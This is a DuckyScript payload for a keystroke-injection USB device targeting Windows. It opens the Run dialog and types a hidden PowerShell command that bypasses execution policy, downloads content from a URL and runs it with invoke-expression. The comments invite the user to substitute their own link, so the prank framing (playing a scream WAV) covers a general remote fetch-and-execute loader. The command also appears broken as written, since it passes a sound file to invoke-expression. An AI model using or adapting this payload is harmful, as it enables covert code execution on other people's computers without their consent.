REM     Title: Play-WAV
REM     Author: I am Jakoby
REM     Description: This payload is meant to play a WAV file hidden. See Play-WAV.ps1 for more details
REM     Target: Windows 10, 11
REM     Remeber to replace the link with your link for the intended file to download
REM     Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properly
GUI r
DELAY 500
STRING powershell -w h -NoP -NonI -Exec Bypass $pl = iwr https://www.shockwave-sound.com/sound-effects/scream-sounds/2scream.wav ?dl=1; invoke-expression $pl
DELAY 500
ENTER
